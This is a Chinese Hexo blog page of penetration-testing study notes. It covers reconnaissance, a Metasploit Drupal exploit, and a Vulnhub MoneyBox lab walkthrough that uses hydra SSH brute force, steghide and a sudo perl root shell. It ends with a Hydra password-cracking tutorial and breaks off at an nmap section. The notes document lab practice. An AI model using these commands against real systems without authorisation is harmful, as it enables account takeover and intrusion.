

<!DOCTYPE html>
<html lang="en" color-mode=light>
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>信息收集 - Hexo</title>
  <meta name="apple-mobile-web-app-capable" content="yes" />
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta name="google" content="notranslate" />
  
  <meta name="description" content="信息收集​      December 29, 202...">
  <meta name="author" content="John Doe">
  <link rel="icon" href="/images/icons/favicon-16x16.png" type="image/png" sizes="16x16">
  <link rel="icon" href="/images/icons/favicon-32x32.png" type="image/png" sizes="32x32">
  <link rel="apple-touch-icon" href="/images/icons/apple-touch-icon.png" sizes="180x180">
  <meta rel="mask-icon" href="/images/icons/stun-logo.svg" color="#333333">
  
    <meta rel="msapplication-TileImage" content="/images/icons/favicon-144x144.png">
    <meta rel="msapplication-TileColor" content="#000000">
  

  
<link rel="stylesheet" href="/css/style.css">


  
    
<link rel="stylesheet" href="https://at.alicdn.com/t/font_1445822_p6ry5n7lrr.css">

  

  
    
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.5.7/jquery.fancybox.min.css">

  

  
    
      
        
        
<link rel="stylesheet" href="https://cdn.bootcss.com/highlight.js/9.18.1/styles/xcode.min.css" name="highlight-style" mode="light">

      
        
        
<link rel="stylesheet" href="https://cdn.bootcss.com/highlight.js/9.18.1/styles/solarized-dark.min.css" name="highlight-style" mode="dark">

      
  

  <script>
    var CONFIG = window.CONFIG || {};
    var ZHAOO = window.ZHAOO || {};
    CONFIG = {
      isHome: false,
      fancybox: true,
      pjax: false,
      loading: {
        gif: '/images/theme/loading.gif',
        lottie: ''
      },
      lazyload: {
        enable: true,
        only_post: 'false',
        loading: {
          gif: '/images/theme/loading.gif',
          lottie: ''
        }
      },
      donate: {
        enable: true,
        alipay: 'https://pic.izhaoo.com/alipay.jpg',
        wechat: 'https://pic.izhaoo.com/wechat.jpg'
      },
      galleries: {
        enable: true
      },
      fab: {
        enable: true,
        always_show: false
      },
      carrier: {
        enable: true
      },
      daovoice: {
        enable: false
      },
      preview: {
        background: {
          default: '',
          api: ''
        },
        motto: {
          default: '我在开了灯的床头下，想问问自己的心啊。',
          typing: true,
          api: 'https://v2.jinrishici.com/one.json',
          data_contents: '["data","content"]'
        },
      },
      qrcode: {
        enable: true,
        type: 'url',
        image: 'https://pic.izhaoo.com/weapp-code.jpg',
      },
      toc: {
        enable: true
      },
      scrollbar: {
        type: 'default'
      },
      notification: {
        enable: false,
        delay: 4500,
        list: '',
        page_white_list: '',
        page_black_list: ''
      },
      search: {
        enable: false,
        path: ''
      }
    }
  </script>

  

  

<meta name="generator" content="Hexo 6.3.0"></head>

<body class="lock-screen">
  <div class="loading" id="loading"></div>
  
    


  <nav class="navbar">
    <div class="left">
      
        <i class="iconfont iconhome j-navbar-back-home"></i>
      
      
        <i class="iconfont iconqrcode j-navbar-qrcode"></i>
      
      
        <i class="iconfont iconmoono" id="color-toggle" color-toggle="light"></i>
      
      
    </div>
    <div class="center">信息收集</div>
    <div class="right">
      <i class="iconfont iconmenu j-navbar-menu"></i>
    </div>
    
      <div id="qrcode-navbar"></div>
    
  </nav>

  
  

<nav class="menu">
  <div class="menu-container">
    <div class="menu-close">
      <i class="iconfont iconbaseline-close-px"></i>
    </div>
    <ul class="menu-content"><li class="menu-item">
        <a href="/ " class="underline "> 首页</a>
      </li><li class="menu-item">
        <a href="/galleries/ " class="underline "> 摄影</a>
      </li><li class="menu-item">
        <a href="/archives/ " class="underline "> 归档</a>
      </li><li class="menu-item">
        <a href="/tags/ " class="underline "> 标签</a>
      </li><li class="menu-item">
        <a href="/categories/ " class="underline "> 分类</a>
      </li><li class="menu-item">
        <a href="/about/ " class="underline "> 关于</a>
      </li></ul>
    
      <div class="menu-copyright"><p>Powered by <a target="_blank" href="https://hexo.io">Hexo</a>  |  Theme - <a target="_blank" href="https://github.com/izhaoo/hexo-theme-zhaoo">zhaoo</a></p></div>
    
  </div>
</nav>
  <main id="main">
  <div class="article-wrap">
    <div class="row container">
      <div class="col-xl-3"></div>
      <div class="col-xl-6"><article class="article">
  <div class="wrap">
    <section class="head">
  <img   class="lazyload" data-original="/images/theme/post-image.jpg" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="  draggable="false">
  <div class="head-mask">
    <h1 class="head-title">信息收集</h1>
    <div class="head-info">
      <span class="post-info-item"><i class="iconfont iconcalendar"></i>January 18, 2024</span>
      
      <span class="post-info-item"><i class="iconfont iconfont-size"></i>9029</span>
    </div>
  </div>
</section>
    <section class="main">
      <section class="content">
        
        <h1 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h1><p>​      December 29, 2023            9110    </p>
<h3 id="web打点"><a href="#web打点" class="headerlink" title="web打点"></a>web打点</h3><p><img    class="lazyload" data-original="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">img</span>web打点</p>
<h4 id="查子域名"><a href="#查子域名" class="headerlink" title="查子域名"></a>查子域名</h4><p>域名信息查询 - 腾讯云(tencent.com)<br>域名Whois查询-站长之家(chinaz.com)</p>
<p>Free Whois Lookup  Whois IP Search &amp; Whois Domain Lookup |Whois.com</p>
<p><a target="_blank" rel="noopener" href="https://fofa.info/toLogin">https://fofa.info/toLogin</a></p>
<p><a target="_blank" rel="noopener" href="https://quake.360.net/quake/#/index">https://quake.360.net/quake/#/index</a></p>
<p><a target="_blank" rel="noopener" href="https://hunter.qianxin.com/">https://hunter.qianxin.com/</a></p>
<p><a target="_blank" rel="noopener" href="https://www.zoomeye.org/business">https://www.zoomeye.org/business</a></p>
<p><a target="_blank" rel="noopener" href="https://www.shodan.io/">https://www.shodan.io/</a></p>
<p><a target="_blank" rel="noopener" href="https://search.censys.io/">https://search.censys.io/</a></p>
<h4 id="查ip"><a href="#查ip" class="headerlink" title="查ip"></a>查ip</h4><p>kali执行命令：</p>
<p>dig qq.com</p>
<p>nslookup qq.com</p>
<h3 id="fiddler"><a href="#fiddler" class="headerlink" title="fiddler"></a>fiddler</h3><p>下载：<a target="_blank" rel="noopener" href="http://192.168.2.6:5244/d/%E7%BD%91%E7%9B%98/%E7%99%BE%E5%BA%A6%E7%BD%91%E7%9B%98/%E8%BD%AF%E4%BB%B6%E5%A4%A7%E5%85%A8/%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7/fiddler%E4%B8%AD%E6%96%87%E7%89%88.zip">http://192.168.2.6:5244/d/%E7%BD%91%E7%9B%98/%E7%99%BE%E5%BA%A6%E7%BD%91%E7%9B%98/%E8%BD%AF%E4%BB%B6%E5%A4%A7%E5%85%A8/%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7/fiddler%E4%B8%AD%E6%96%87%E7%89%88.zip</a></p>
<p>设置：<a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s?__biz=MzU2NDM2OTQxMw==&mid=2247484054&idx=1&sn=3440b36b071491a9b7a03e1e293aab57&chksm=fc4d43fccb3acaea94fd6073cba7f68efad9ba21177694ec7599d99cb7330ffa7edf01f80002&scene=27">https://mp.weixin.qq.com/s?__biz=MzU2NDM2OTQxMw==&amp;mid=2247484054&amp;idx=1&amp;sn=3440b36b071491a9b7a03e1e293aab57&amp;chksm=fc4d43fccb3acaea94fd6073cba7f68efad9ba21177694ec7599d99cb7330ffa7edf01f80002&amp;scene=27</a></p>
<p>使用：<a target="_blank" rel="noopener" href="https://blog.csdn.net/Mubei1314/article/details/122389950">https://blog.csdn.net/Mubei1314/article/details/122389950</a></p>
<h3 id="打靶"><a href="#打靶" class="headerlink" title="打靶"></a>打靶</h3><p>dirsearch -u “<a target="_blank" rel="noopener" href="http://192.168.2.31/">http://192.168.2.31</a>“ -x 403,404 </p>
<p> msfconsole</p>
<p>search drupal</p>
<p>use 2</p>
<p>show options</p>
<p>set rhosts 192.168.2.88</p>
<p>run</p>
<p>shell</p>
<p>python -c “import pty;pty.spawn(‘&#x2F;bin&#x2F;bash’)”</p>
<p>find &#x2F; -user root -perm -4000 -print 2&gt;&#x2F;dev&#x2F;null</p>
<p>find &#x2F; -name cron.php -exec “&#x2F;bin&#x2F;sh” ; </p>
<p><img    class="lazyload" data-original="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">img</span>打靶3</p>
<p><img    class="lazyload" data-original="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">img</span>打靶2</p>
<p><img    class="lazyload" data-original="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">img</span>打靶1</p>
<p><img    class="lazyload" data-original="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">img</span>打靶</p>
<h3 id="搜索规则"><a href="#搜索规则" class="headerlink" title="搜索规则"></a>搜索规则</h3><p>百度：要求查找ip地址的信息去除csdn的内容搜索博客园的内容，类似于：ip地址 -CSDN博客 +博客园</p>
<p>谷歌：</p>
<p>双引号包起来会查找连续的内容</p>
<p>加* 通配符-星号，代表完整的字词; A * B、A * * B这两个是有区别的</p>
<p>filetype：pdf  检索pdf文件</p>
<p>联合搜索加空格</p>
<p>inurl：login： 地址栏中包含login</p>
<p>更多语法：<a target="_blank" rel="noopener" href="https://www.yuque.com/sunwu-pbywz/oc04c5/hinmiv?inner=KdFrB">https://www.yuque.com/sunwu-pbywz/oc04c5/hinmiv?inner=KdFrB</a></p>
<h3 id="支付漏洞"><a href="#支付漏洞" class="headerlink" title="支付漏洞"></a>支付漏洞</h3><p>Business logic vulnerabilities 业务逻辑漏洞</p>
<p>例：<a target="_blank" rel="noopener" href="https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-excessive-trust-in-client-side-controls">Excessive trust in client-side controls</a></p>
<p><a target="_blank" rel="noopener" href="https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-high-level">High-level logic vulnerability</a></p>
<h3 id="pikachu打靶"><a href="#pikachu打靶" class="headerlink" title="pikachu打靶"></a>pikachu打靶</h3><h4 id="暴力破解"><a href="#暴力破解" class="headerlink" title="暴力破解"></a>暴力破解</h4><p>bp抓包选择集束炸弹模式，选择账号与密码两个点$进行。</p>
<p>yakit抓包插入模糊字典</p>
<p>绕过验证码可以使用禁止页面使用js的方式</p>
<h4 id="pikachu-xss"><a href="#pikachu-xss" class="headerlink" title="pikachu xss"></a>pikachu xss</h4><p><img    class="lazyload" data-original="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">img</span>domxss</p>
<p><img    class="lazyload" data-original="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">img</span>domxss-x</p>
<p><img    class="lazyload" data-original="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">img</span>盲打</p>
<p><img    class="lazyload" data-original="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">img</span>过滤</p>
<p><img    class="lazyload" data-original="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">img</span>htmlspecialchars</p>
<p><img    class="lazyload" data-original="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">img</span>herf输出</p>
<p><img    class="lazyload" data-original="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">img</span>js输出</p>
<h3 id="oracle-virtualbox打靶"><a href="#oracle-virtualbox打靶" class="headerlink" title="oracle virtualbox打靶"></a>oracle virtualbox打靶</h3><h4 id="下载virtualbox"><a href="#下载virtualbox" class="headerlink" title="下载virtualbox"></a>下载virtualbox</h4><p><a target="_blank" rel="noopener" href="http://192.168.2.6:5244/d/%E7%BD%91%E7%9B%98/%E7%99%BE%E5%BA%A6%E7%BD%91%E7%9B%98/%E8%BD%AF%E4%BB%B6%E5%A4%A7%E5%85%A8/ensp-3c/ensp3c%E7%89%88%E6%96%B0%E7%89%88%E5%AE%89%E8%A3%85%E5%8C%85/VirtualBox-5.2.28-130011-Win.exe">http://192.168.2.6:5244/d/%E7%BD%91%E7%9B%98/%E7%99%BE%E5%BA%A6%E7%BD%91%E7%9B%98/%E8%BD%AF%E4%BB%B6%E5%A4%A7%E5%85%A8/ensp-3c/ensp3c%E7%89%88%E6%96%B0%E7%89%88%E5%AE%89%E8%A3%85%E5%8C%85/VirtualBox-5.2.28-130011-Win.exe</a></p>
<h4 id="moneybox-ova"><a href="#moneybox-ova" class="headerlink" title="moneybox.ova"></a>moneybox.ova</h4><p><a target="_blank" rel="noopener" href="http://192.168.2.6:5244/d/%E7%BD%91%E7%9B%98/%E7%99%BE%E5%BA%A6%E7%BD%91%E7%9B%98/%E9%95%9C%E5%83%8F%E5%A4%A7%E5%85%A8/%E9%9D%B6%E6%9C%BA/%E4%B8%80%E8%B5%B7%E6%9D%A5%E6%89%93%E9%9D%B6/0.1/moneyBox/MoneyBox.ova">http://192.168.2.6:5244/d/%E7%BD%91%E7%9B%98/%E7%99%BE%E5%BA%A6%E7%BD%91%E7%9B%98/%E9%95%9C%E5%83%8F%E5%A4%A7%E5%85%A8/%E9%9D%B6%E6%9C%BA/%E4%B8%80%E8%B5%B7%E6%9D%A5%E6%89%93%E9%9D%B6/0.1/moneyBox/MoneyBox.ova</a></p>
<p>导入ova文件</p>
<p>在网络设置中连接方式改为仅主机，virtualbox host-only ethernet adapter</p>
<p>use设备改为usb1</p>
<h4 id="vulnhub-MONEYBOX-1"><a href="#vulnhub-MONEYBOX-1" class="headerlink" title="vulnhub-MONEYBOX: 1"></a>vulnhub-MONEYBOX: 1</h4><p>开启kali</p>
<p>ifdown eth0</p>
<p>ifup eth0</p>
<p>arp-scan -l -i etho</p>
<p>nmap -p 1-10000 192.168.56.101</p>
<p>nmap -p 21,22,80 192.168.56.101</p>
<p>dirsearch -u “<a target="_blank" rel="noopener" href="http://192.168.56.101/">http://192.168.56.101</a>“ -x 403,404,401(查出blogs目录，查看页面得到S3cr3t-T3xt,跳转至该目录得到密钥)</p>
<p>nmap -p 21,22,80 -sC 192.168.56.101(此处可发现Anonymous账号)（这是一个使用 nmap 工具进行端口扫描和脚本扫描的命令。具体来说，该命令指定了要扫描的端口（21、22和80），并启用了默认的脚本扫描。<code>nmap</code> 是一个常用的网络扫描工具，用于发现和识别目标主机上开放的端口和提供的服务。通过指定不同的扫描选项和参数，可以对目标主机进行多种类型的扫描，包括端口扫描、操作系统识别、服务和版本识别等。在你提供的命令中，<code>-p 21,22,80</code> 参数指定了要扫描的端口，即 21、22 和 80。<code>-sC</code> 参数启用了默认的脚本扫描，这将运行一系列内置的脚本来探测和识别目标主机上的服务。<code>192.168.56.101</code> 是目标主机的 IP 地址，这是你要对其进行扫描的目标。）</p>
<p>ftp 192.168.56.101</p>
<p>ls</p>
<p>get trytofind.jpg</p>
<p>exit</p>
<p>ls</p>
<p>strings trytofind.jpg</p>
<p>apt install steghide</p>
<p>steghide extract -sf trytofind.jpg</p>
<p>cat data.txt</p>
<p>hydra -l renu -P &#x2F;usr&#x2F;share&#x2F;wordlists&#x2F;Passwords&#x2F;darkweb2017-top10000.txt ssh:&#x2F;&#x2F;192.168.56.101</p>
<p>ssh <a href="mailto:renu@192.168.56.101">renu@192.168.56.101</a></p>
<p>ls</p>
<p>cat user1.txt</p>
<p>ls -al</p>
<p>cat .bash_history</p>
<p>ssh <a href="mailto:lily@192.168.56.101">lily@192.168.56.101</a></p>
<p>ls -al</p>
<p>cat user2.txt</p>
<p>sudo perl -e ‘exec”&#x2F;bin&#x2F;sh”;’</p>
<p>cd &#x2F;root</p>
<p>ls -al</p>
<p>cat .root.txt</p>
<p>相关操作命令：<a target="_blank" rel="noopener" href="https://gtfobins.github.io/">https://gtfobins.github.io/</a></p>
<p>靶场参考<a target="_blank" rel="noopener" href="https://www.yuque.com/g/sunwu-pbywz/baji/un4pf9/collaborator/join?token=qFv08WRcPtc1ivgS&source=doc_collaborator#">https://www.yuque.com/g/sunwu-pbywz/baji/un4pf9/collaborator/join?token=qFv08WRcPtc1ivgS&amp;source=doc_collaborator#</a> </p>
<h5 id="相关知识点："><a href="#相关知识点：" class="headerlink" title="相关知识点："></a>相关知识点：</h5><h6 id="dirsearch"><a href="#dirsearch" class="headerlink" title="dirsearch"></a>dirsearch</h6><p><code>python3 dirsearch.py -u &quot;https://example.com&quot;</code><br>扫描<a target="_blank" rel="noopener" href="https://example.com网站/">https://example.com网站</a><br><code>python3 dirsearch.py -e php,html -u &quot;https://example.com&quot;</code><br>指定文件扩展名<br><code>python3 dirsearch.py -e php,html -u &quot;https://example.com&quot; -w /wordlist</code><br>指定字典<br><code>python3 dirsearch.py -e php -u &quot;https://example.com&quot; --prefixes .,admin,_</code><br>指定前缀，为 . admin _<br><code>python3 dirsearch.py -e php,html,txt -u &quot;https://example.com&quot; -t 20</code><br>指定线程数量–20</p>
<h6 id="perl提权"><a href="#perl提权" class="headerlink" title="perl提权"></a>perl提权</h6><p>通过生成交互式系统 shell 来脱离受限环境。</p>
<p>如果允许二进制文件以超级用户身份运行，则它不会删除提升的权限 <code>sudo</code> ，并且可用于访问文件系统、升级或维护特权访问。</p>
<ul>
<li><code>sudo perl -e &#39;exec &quot;/bin/sh&quot;;&#39; ###### 使用Hydra破解弱密码Hydra，俗称九头蛇，是一款非常强大的暴力破解工具，支持多种服务协议的账号和密码进行爆破，包括Web登录、数据库、SSH、FTP等服务，支持Linux、Windows、Mac平台安装。它是由著名的黑客组织THC开发的一款开源暴力破解、验证性质的工具。目前该工具支持以下协议的爆破：```txtAFP，Cisco  AAA，Cisco身份验证，Cisco启用，CVS，Firebird，FTP，HTTP-FORM-GET，HTTP-FORM-POST，HTTP-GET，HTTP-HEAD，HTTP-PROXY，HTTPS-FORM-  GET，HTTPS-FORM-POST，HTTPS-GET，HTTPS-HEAD，HTTP-Proxy，ICQ，IMAP，IRC，LDAP，MS-SQL，MYSQL，NCP，NNTP，Oracle Listener，Oracle SID，Oracle，PC-Anywhere，  PCNFS，POP3，POSTGRES，RDP，Rexec，Rlogin，Rsh，SAP /  R3，SIP，SMB，SMTP，SMTP枚举，SNMP，SOCKS5，SSH（v1和v2），Subversion，Teamspeak（TS2），Telnet，VMware-Auth ，VNC和XMPP </code></li>
</ul>
<p>1、常见参数</p>
<p> Hydra是一个命令行工具，所有的操作都是通过命令和参数实现的，如下就是最常见的Hydra暴力破解的参数：</p>
<table>
<thead>
<tr>
<th>选项</th>
<th>说明</th>
</tr>
</thead>
<tbody><tr>
<td>-R</td>
<td>继续上一次破解</td>
</tr>
<tr>
<td>-I</td>
<td>忽略现有还原文件（不等待10秒）</td>
</tr>
<tr>
<td>-s PORT</td>
<td>指定默认端口</td>
</tr>
<tr>
<td>-l LOGIN</td>
<td>指定破解登录用户名</td>
</tr>
<tr>
<td>-L FILE</td>
<td>使用文件指定多个用户名</td>
</tr>
<tr>
<td>-p PASS</td>
<td>指定密码</td>
</tr>
<tr>
<td>-P FILE</td>
<td>指定密码字典</td>
</tr>
<tr>
<td>-x MIN:MAX:CHARSET</td>
<td>密码暴力生成</td>
</tr>
<tr>
<td>-y</td>
<td>禁止在暴力破解中使用符号</td>
</tr>
<tr>
<td>-r</td>
<td>对选项-x使用非随机方法</td>
</tr>
<tr>
<td>-e nsr</td>
<td>n：空密码试探，s：使用指定用户和密码试探。</td>
</tr>
<tr>
<td>-u</td>
<td>循环用户</td>
</tr>
<tr>
<td>-C FILE</td>
<td>冒号分隔用户名密码：“login:pass” 格式</td>
</tr>
<tr>
<td>-M FILE</td>
<td>要攻击的服务器列表，每行一个条目，’:’指定端口</td>
</tr>
<tr>
<td>-o FILE</td>
<td>将找到的登录&#x2F;密码写入文件</td>
</tr>
<tr>
<td>-b FORMAT</td>
<td>指定-o输出格式，默认text,可选json, jsonv1</td>
</tr>
<tr>
<td>-f &#x2F; -F</td>
<td>找到用户名&#x2F;密码后中止破解，-f:每个主机，-F：所有</td>
</tr>
<tr>
<td>-t TASKS</td>
<td>每个主机并行线程数，默认16</td>
</tr>
<tr>
<td>-T TASKS</td>
<td>所有并行线程数，默认64</td>
</tr>
<tr>
<td>-w &#x2F; -W TIME</td>
<td>最大等待响应时间</td>
</tr>
<tr>
<td>-c TIME</td>
<td>所有进程每次尝试登录等待时间</td>
</tr>
<tr>
<td>-4 &#x2F; -6</td>
<td>IPv4(默认)&#x2F;IPv6地址</td>
</tr>
<tr>
<td>-v &#x2F; -V &#x2F; -d</td>
<td>详细日志模式&#x2F;每次尝试仅显示用户名密码&#x2F;调试模式</td>
</tr>
<tr>
<td>-k</td>
<td>不重做失败的尝试（适用于-M批量扫描）</td>
</tr>
<tr>
<td>-q</td>
<td>不要打印错误连接消息</td>
</tr>
<tr>
<td>-U</td>
<td>服务模块详细使用信息</td>
</tr>
</tbody></table>
<p>2、案例1-ftp服务账号破解</p>
<p>提前准备一个ftp服务器，以及登录账号和密码（allen、123456），我们可以使用单个用户名破解密码。</p>
<p>aa.txt文件是需要提前准备的常用密码字典，需要包括123456才行。</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs stylus">hydra  -l allen -P e:\aa<span class="hljs-selector-class">.txt</span> ftp:<span class="hljs-comment">//127.0.0.1</span><br></code></pre></td></tr></table></figure>

<p><img    class="lazyload" data-original="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">img</span>img</p>
<p>3、案例2-mysql账号破解</p>
<p>提前准备一个mysql服务器，以及登录账号和密码（root、root），我们可以使用单个用户名破解密码。</p>
<p>aa.txt文件是需要提前准备的常用密码字典，需要包括root才行。</p>
<p>-e nsr  :指定可以尝试空密码。</p>
<figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs nginx"><span class="hljs-attribute">hydra</span> -l root -P e:\aa.txt -e nsr <span class="hljs-number">127.0.0.1</span> mysql <br></code></pre></td></tr></table></figure>

<p><img    class="lazyload" data-original="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">img</span>img</p>
<p>4、案例3-ssh账号破解</p>
<p>案例中的以阿里云服务器演示，给的指令中的地址和密码需要换成自己的。</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">hydra</span> -l root -p <span class="hljs-number">123456</span> <span class="hljs-number">120.26.12.53</span> ssh<br><span class="hljs-attribute">hydra</span> -l root -p <span class="hljs-number">123456</span> ssh://<span class="hljs-number">120.26.12.53</span><br><span class="hljs-attribute">hydra</span> -l root -P e:\aa.txt -e nsr ssh://<span class="hljs-number">120.26.12.53</span><br></code></pre></td></tr></table></figure>

<p><img    class="lazyload" data-original="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">img</span>img</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs stylus">hydra -l root -P e:\aa<span class="hljs-selector-class">.txt</span> -e nsr -vV ssh:<span class="hljs-comment">//120.26.12.53</span><br></code></pre></td></tr></table></figure>

<p>-v参数显示详细的暴力破解的过程。</p>
<p><img    class="lazyload" data-original="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">img</span>img</p>
<p>5、案例4-HTTP协议中POST请求破解</p>
<p>可以使用hydra通过网站的登录请求（一般是post），来破解账号和密码（案例中的网址和密码需替换）。</p>
<p>基本的命令为：</p>
<figure class="highlight gherkin"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs gherkin">hydra -l <span class="hljs-variable">&lt;username&gt;</span> -P <span class="hljs-variable">&lt;wordlist&gt;</span> 10.10.146.53 http-post-form <span class="hljs-string">&quot;/:username=^USER^&amp;password=^PASS^:F=incorrect&quot;</span> -V<br></code></pre></td></tr></table></figure>

<h3 id="nmap命令的使用"><a href="#nmap命令的使用" class="headerlink" title="nmap命令的使用"></a>nmap命令的使用</h3><p>可用于：</p>
